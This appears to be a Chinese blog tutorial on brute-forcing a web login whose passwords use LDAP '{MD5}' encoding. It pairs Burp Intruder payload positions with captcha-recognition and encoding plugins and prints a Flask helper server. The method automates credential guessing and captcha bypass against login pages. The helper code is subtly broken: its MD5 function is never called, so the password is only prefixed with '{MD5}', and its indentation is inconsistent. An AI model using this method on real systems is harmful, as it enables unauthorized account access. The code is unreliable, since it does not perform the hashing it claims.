登录口爆破之ldap的md5加密、验证码识别

ldap的md5加密配合autoDecoder插件、captcha-killer-modified插件

需要传入的数据包为:

{"username":"admin","password":"{MD5}ISMvKXpXpadDiUoOSoAfww==","code":"YJIV"}

intruder数据包设置如下：

{"username":"admin","password":"§1§","code":"§JOEJ§"}

intruder设置如下：

由于我们只针对intruder里的账号密码进行爆破，所以解密接口我们用不到，直接捕捉到数据包直接返回即可：

@app.route('/decode',methods=["POST"]) # 不解密  
def decrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	return param  

加密服务端代码如下：

# -*- coding:utf-8 -*-  
# author:f0ngf0ng  
  
# ldap的md5加密爆破  
  
from flask import Flask,Response,request  
from pyDes import *  
import base64,hashlib,json  
  
def hash_md5(data):  
    md = hashlib.md5()  
    md.update(str(data))  
    a = md.digest()  
    b = base64.b64encode(a)  
    return b  
  
app = Flask(__name__)  
  
@app.route('/encode',methods=["POST"])  
def encrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	data = json.loads(param)  
    print(data)  
    encry_param = param.replace( "password': '"+ data['password'],"password': '"+"{MD5}" + data['password']) # 密文替换明文，且添加{MD5}关键字  
    return encry_param  
  
@app.route('/decode',methods=["POST"]) # 不解密  
def decrypt():  
    param = request.form.get('data')  # 获取  post 参数  
	return param  
  
if __name__ == '__main__':  
    app.debug = True # 设置调试模式，生产模式的时候要关掉debug  
	app.run(host="0.0.0.0",port="8888")

运行如下

python flask.py

autoDecoder设置如下：

captcha-killer-modified插件页面如下：

爆破如下：

https://github.com/f0ng/autoDecoder

https://github.com/f0ng/captcha-killer-modified